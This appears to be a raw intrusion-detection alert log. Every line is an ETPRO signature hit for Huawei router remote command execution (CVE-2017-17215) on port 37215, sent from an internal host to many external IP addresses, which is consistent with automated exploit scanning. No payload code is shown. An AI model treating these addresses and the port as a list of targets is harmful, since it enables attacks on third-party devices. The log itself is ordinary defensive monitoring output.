                                                    07/10/24-08:26:28.935220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783637215192.168.2.1441.191.105.102
                                                    07/10/24-08:26:14.762388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667837215192.168.2.1441.226.57.228
                                                    07/10/24-08:27:30.510800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642637215192.168.2.14185.2.56.118
                                                    07/10/24-08:26:41.391296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575037215192.168.2.14197.32.124.201
                                                    07/10/24-08:26:55.325101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759837215192.168.2.14197.237.63.137
                                                    07/10/24-08:27:10.595631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353237215192.168.2.1441.44.255.235
                                                    07/10/24-08:26:38.649954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867637215192.168.2.14197.127.92.141
                                                    07/10/24-08:27:22.792743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313437215192.168.2.14157.93.219.82
                                                    07/10/24-08:26:23.351340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631037215192.168.2.14157.42.138.224
                                                    07/10/24-08:26:25.433410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569437215192.168.2.14197.132.60.165
                                                    07/10/24-08:27:08.373070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196437215192.168.2.14157.124.180.157
                                                    07/10/24-08:26:41.462322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4500237215192.168.2.14197.222.7.148
                                                    07/10/24-08:27:23.457605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805637215192.168.2.1497.17.74.83
                                                    07/10/24-08:26:26.619862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040237215192.168.2.1441.85.40.104
                                                    07/10/24-08:27:07.276755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4417237215192.168.2.1441.123.108.150
                                                    07/10/24-08:26:23.360757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217837215192.168.2.14197.16.131.63
                                                    07/10/24-08:26:23.284059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769437215192.168.2.14197.232.32.151
                                                    07/10/24-08:27:24.951941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743437215192.168.2.14157.222.189.203
                                                    07/10/24-08:26:29.885713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328037215192.168.2.14138.234.234.79
                                                    07/10/24-08:27:11.528287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551237215192.168.2.1462.238.180.159
                                                    07/10/24-08:27:10.554051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661637215192.168.2.14157.116.55.253
                                                    07/10/24-08:26:29.790374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4245237215192.168.2.1441.183.51.51
                                                    07/10/24-08:26:43.550516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532237215192.168.2.14206.185.235.225
                                                    07/10/24-08:27:19.222748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358237215192.168.2.14197.184.153.59
                                                    07/10/24-08:27:05.189899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213237215192.168.2.142.173.118.106
                                                    07/10/24-08:26:48.708629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096837215192.168.2.14157.112.179.99
                                                    07/10/24-08:27:14.825720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241237215192.168.2.14157.168.48.95
                                                    07/10/24-08:26:25.477490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141437215192.168.2.14163.65.250.83
                                                    07/10/24-08:27:17.030907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242037215192.168.2.14128.213.0.99
                                                    07/10/24-08:27:19.191289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800637215192.168.2.1441.164.144.222
                                                    07/10/24-08:26:11.562069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440237215192.168.2.1441.105.18.185
                                                    07/10/24-08:26:23.332526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624837215192.168.2.14197.255.227.65
                                                    07/10/24-08:27:14.026941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386837215192.168.2.14157.106.148.189
                                                    07/10/24-08:26:31.053236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493037215192.168.2.14197.34.19.245
                                                    07/10/24-08:27:14.675779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080237215192.168.2.14211.15.136.160
                                                    07/10/24-08:26:31.059719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020837215192.168.2.14184.160.93.248
                                                    07/10/24-08:26:33.237897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012437215192.168.2.1441.60.4.129
                                                    07/10/24-08:26:55.449292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838037215192.168.2.1441.3.115.251
                                                    07/10/24-08:26:23.347149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178237215192.168.2.1441.234.61.77
                                                    07/10/24-08:26:43.613127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582437215192.168.2.14157.21.199.57
                                                    07/10/24-08:27:14.859922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082637215192.168.2.14197.72.196.6
                                                    07/10/24-08:27:33.915433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420437215192.168.2.1441.244.49.63
                                                    07/10/24-08:26:20.139461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499637215192.168.2.14157.24.103.105
                                                    07/10/24-08:26:57.632458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889037215192.168.2.14157.174.238.190
                                                    07/10/24-08:27:08.439575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157637215192.168.2.14157.140.235.15
                                                    07/10/24-08:27:22.920662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917437215192.168.2.14157.32.35.177
                                                    07/10/24-08:26:13.798574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101037215192.168.2.1441.60.51.46
                                                    07/10/24-08:27:28.126957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719037215192.168.2.1441.66.50.73
                                                    07/10/24-08:26:53.191310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525837215192.168.2.14221.0.25.221
                                                    07/10/24-08:26:17.956577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777437215192.168.2.14197.98.185.93
                                                    07/10/24-08:27:02.931527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541237215192.168.2.14197.58.164.119
                                                    07/10/24-08:26:36.415426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4513837215192.168.2.14157.75.195.168
                                                    07/10/24-08:27:13.990373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5706237215192.168.2.14197.43.8.190
                                                    07/10/24-08:26:18.027380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412237215192.168.2.14157.241.227.83
                                                    07/10/24-08:26:13.743815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684437215192.168.2.1441.132.43.2
                                                    07/10/24-08:26:36.351608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903837215192.168.2.14199.32.165.4
                                                    07/10/24-08:27:17.084652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474837215192.168.2.14197.80.254.31
                                                    07/10/24-08:26:38.611968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227637215192.168.2.14119.250.216.89
                                                    07/10/24-08:26:38.559179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980637215192.168.2.14197.75.59.75
                                                    07/10/24-08:26:51.950899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587437215192.168.2.14197.87.167.58
                                                    07/10/24-08:26:33.189850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755037215192.168.2.14157.238.91.200
                                                    07/10/24-08:27:20.460857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758437215192.168.2.1486.30.184.114
                                                    07/10/24-08:26:36.355450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069637215192.168.2.1441.50.54.120
                                                    07/10/24-08:26:55.369458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993637215192.168.2.14157.253.174.78
                                                    07/10/24-08:27:13.761969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474837215192.168.2.14157.185.243.255
                                                    07/10/24-08:26:47.953100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775437215192.168.2.14160.213.248.65
                                                    07/10/24-08:26:17.999668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803837215192.168.2.14157.105.44.174
                                                    07/10/24-08:26:34.202550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198637215192.168.2.1439.98.61.235
                                                    07/10/24-08:26:36.417902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910837215192.168.2.1441.232.103.226
                                                    07/10/24-08:26:59.633265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864837215192.168.2.1441.6.15.234
                                                    07/10/24-08:26:44.496105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092237215192.168.2.14157.27.180.71
                                                    07/10/24-08:26:13.714672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813237215192.168.2.14197.152.159.76
                                                    07/10/24-08:26:52.013363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449837215192.168.2.1441.14.39.170
                                                    07/10/24-08:26:20.151751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520837215192.168.2.1441.90.116.98
                                                    07/10/24-08:26:52.013790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699237215192.168.2.1441.209.118.183
                                                    07/10/24-08:26:31.102149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499437215192.168.2.1472.51.80.71
                                                    07/10/24-08:27:33.919231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232837215192.168.2.1441.66.179.211
                                                    07/10/24-08:26:26.602369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425037215192.168.2.142.250.113.60
                                                    07/10/24-08:27:22.931726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920237215192.168.2.14157.44.159.153
                                                    07/10/24-08:26:41.558388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956437215192.168.2.1441.92.38.207
                                                    07/10/24-08:27:11.537830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904437215192.168.2.14157.112.220.143
                                                    07/10/24-08:26:36.429054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812037215192.168.2.1441.212.23.35
                                                    07/10/24-08:26:23.320405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428637215192.168.2.1498.214.224.42
                                                    07/10/24-08:26:31.106288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099037215192.168.2.14191.174.109.44
                                                    07/10/24-08:27:20.518150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3384637215192.168.2.1471.65.243.62
                                                    07/10/24-08:27:05.199033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948637215192.168.2.1482.169.30.207
                                                    07/10/24-08:26:11.105620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469637215192.168.2.1495.51.118.14
                                                    07/10/24-08:26:22.273376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854837215192.168.2.1441.117.106.174
                                                    07/10/24-08:27:30.549357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5963037215192.168.2.14133.201.129.208
                                                    07/10/24-08:26:55.412388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821437215192.168.2.14124.183.166.184
                                                    07/10/24-08:27:24.863618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14189.8.244.5
                                                    07/10/24-08:27:10.586352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982437215192.168.2.14197.239.133.147
                                                    07/10/24-08:27:20.460517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633237215192.168.2.1441.171.144.71
                                                    07/10/24-08:26:36.421240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490237215192.168.2.1441.0.114.121
                                                    07/10/24-08:26:15.865935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357437215192.168.2.14157.209.3.135
                                                    07/10/24-08:26:49.904329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499037215192.168.2.1463.67.86.83
                                                    07/10/24-08:27:07.310052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.1441.177.22.63
                                                    07/10/24-08:27:23.934350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688237215192.168.2.1441.53.104.113
                                                    07/10/24-08:26:17.989759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713637215192.168.2.1497.208.116.45
                                                    07/10/24-08:26:34.223283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285837215192.168.2.14197.192.199.111
                                                    07/10/24-08:27:02.968526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825037215192.168.2.14197.73.58.83
                                                    07/10/24-08:26:36.375796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130037215192.168.2.1469.156.250.253
                                                    07/10/24-08:26:15.827757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090237215192.168.2.14197.160.231.121
                                                    07/10/24-08:26:45.632406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547237215192.168.2.14157.112.169.0
                                                    07/10/24-08:27:22.479791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499837215192.168.2.1463.150.113.83
                                                    07/10/24-08:27:17.057474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122837215192.168.2.14157.245.236.20
                                                    07/10/24-08:26:52.068814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.1441.128.191.26
                                                    07/10/24-08:26:26.586309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549437215192.168.2.1441.34.101.238
                                                    07/10/24-08:27:14.879570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519637215192.168.2.14157.141.106.193
                                                    07/10/24-08:26:33.239188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135837215192.168.2.142.13.222.90
                                                    07/10/24-08:26:47.766466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040837215192.168.2.14157.76.86.105
                                                    07/10/24-08:26:57.644791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351637215192.168.2.14196.200.178.240
                                                    07/10/24-08:26:29.812412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596637215192.168.2.1490.155.199.38
                                                    07/10/24-08:26:57.596695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638637215192.168.2.14197.78.64.142
                                                    07/10/24-08:26:47.877445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362037215192.168.2.14157.247.220.159
                                                    07/10/24-08:26:59.881889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964837215192.168.2.14197.117.242.178
                                                    07/10/24-08:26:20.098381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564837215192.168.2.14207.151.84.26
                                                    07/10/24-08:26:49.907599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395637215192.168.2.14145.15.143.233
                                                    07/10/24-08:26:55.403312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237237215192.168.2.14178.250.211.24
                                                    07/10/24-08:26:52.081340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598837215192.168.2.14197.167.205.145
                                                    07/10/24-08:27:22.933936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287637215192.168.2.14117.76.38.158
                                                    07/10/24-08:26:41.421188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655037215192.168.2.1441.108.41.48
                                                    07/10/24-08:27:33.970965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658437215192.168.2.1441.56.196.111
                                                    07/10/24-08:27:20.483064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961837215192.168.2.14197.224.57.99
                                                    07/10/24-08:26:22.256759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520637215192.168.2.14101.234.69.144
                                                    07/10/24-08:26:55.373559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459037215192.168.2.14157.4.232.55
                                                    07/10/24-08:26:28.834166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669437215192.168.2.14157.121.238.188
                                                    07/10/24-08:27:05.141493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299837215192.168.2.14188.249.143.47
                                                    07/10/24-08:26:26.593421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681037215192.168.2.14157.150.226.23
                                                    07/10/24-08:26:42.406060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554237215192.168.2.1441.78.2.138
                                                    07/10/24-08:26:52.011560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840837215192.168.2.14109.221.89.21
                                                    07/10/24-08:27:08.379030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085837215192.168.2.1441.64.17.14
                                                    07/10/24-08:27:22.777206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550037215192.168.2.14133.111.60.159
                                                    07/10/24-08:27:33.729684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284437215192.168.2.14197.216.185.195
                                                    07/10/24-08:26:59.658775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753437215192.168.2.1441.204.62.151
                                                    07/10/24-08:26:25.526388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649037215192.168.2.1495.49.65.206
                                                    07/10/24-08:26:23.318563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653437215192.168.2.14157.27.4.10
                                                    07/10/24-08:27:22.924312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547037215192.168.2.14197.155.72.95
                                                    07/10/24-08:26:13.668084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979437215192.168.2.14197.242.25.28
                                                    07/10/24-08:26:31.090916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214437215192.168.2.14197.30.127.130
                                                    07/10/24-08:26:17.981659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514437215192.168.2.1441.237.193.22
                                                    07/10/24-08:27:10.664334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659437215192.168.2.1441.165.83.114
                                                    07/10/24-08:26:20.132351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683437215192.168.2.14197.243.177.158
                                                    07/10/24-08:26:59.751989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782837215192.168.2.14222.32.131.246
                                                    07/10/24-08:27:22.896369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481037215192.168.2.14197.239.113.81
                                                    07/10/24-08:26:43.856706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834037215192.168.2.14197.10.244.203
                                                    07/10/24-08:27:11.490604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.14157.227.60.70
                                                    07/10/24-08:26:13.807445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567637215192.168.2.1441.161.207.152
                                                    07/10/24-08:26:13.820955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557037215192.168.2.1441.237.79.168
                                                    07/10/24-08:26:34.243243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571437215192.168.2.1441.125.76.140
                                                    07/10/24-08:26:33.243765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878637215192.168.2.14137.193.38.46
                                                    07/10/24-08:27:22.839204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653437215192.168.2.14157.211.187.36
                                                    07/10/24-08:26:51.960962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279637215192.168.2.14152.14.181.15
                                                    07/10/24-08:26:11.148084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.1441.115.148.8
                                                    07/10/24-08:26:17.989759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3665837215192.168.2.14157.203.79.123
                                                    07/10/24-08:26:59.553454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585837215192.168.2.14181.91.99.73
                                                    07/10/24-08:26:28.911510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319237215192.168.2.14157.59.45.245
                                                    07/10/24-08:27:23.888639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852437215192.168.2.14197.94.44.32
                                                    07/10/24-08:27:14.801528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885237215192.168.2.14197.161.83.25
                                                    07/10/24-08:26:26.516253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607037215192.168.2.14209.205.6.145
                                                    07/10/24-08:26:55.407973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218437215192.168.2.14209.118.128.54
                                                    07/10/24-08:27:23.786219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732237215192.168.2.1441.122.235.42
                                                    07/10/24-08:26:53.124303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328037215192.168.2.14157.58.189.87
                                                    07/10/24-08:27:31.527963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411237215192.168.2.14197.177.133.118
                                                    07/10/24-08:27:07.372864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613837215192.168.2.14157.246.84.15
                                                    07/10/24-08:27:11.529437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575237215192.168.2.1441.79.255.134
                                                    07/10/24-08:26:38.608581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3665837215192.168.2.14194.184.180.187
                                                    07/10/24-08:26:34.239343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577237215192.168.2.1441.167.244.253
                                                    07/10/24-08:27:31.526577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635237215192.168.2.14157.56.234.212
                                                    07/10/24-08:26:14.771474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584437215192.168.2.1491.94.11.112
                                                    07/10/24-08:26:53.205499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728037215192.168.2.14157.82.169.236
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649637215192.168.2.14157.190.16.179
                                                    07/10/24-08:26:52.066193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912837215192.168.2.1441.68.134.25
                                                    07/10/24-08:26:52.002515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571437215192.168.2.1441.157.168.76
                                                    07/10/24-08:27:22.918305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199637215192.168.2.14157.253.136.243
                                                    07/10/24-08:27:30.508091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807637215192.168.2.14197.46.227.81
                                                    07/10/24-08:26:47.929334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975037215192.168.2.14197.255.14.135
                                                    07/10/24-08:27:33.874672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795637215192.168.2.14197.158.220.191
                                                    07/10/24-08:26:42.432411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924437215192.168.2.1457.212.248.158
                                                    07/10/24-08:27:22.532374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230437215192.168.2.14158.142.141.18
                                                    07/10/24-08:26:51.966611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825637215192.168.2.1475.91.177.209
                                                    07/10/24-08:27:23.920658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082037215192.168.2.14197.112.242.55
                                                    07/10/24-08:26:17.947291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313837215192.168.2.14187.19.183.36
                                                    07/10/24-08:27:33.768377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863637215192.168.2.1441.205.225.5
                                                    07/10/24-08:27:30.417770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877837215192.168.2.1441.226.236.122
                                                    07/10/24-08:26:26.613103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339037215192.168.2.1441.168.148.97
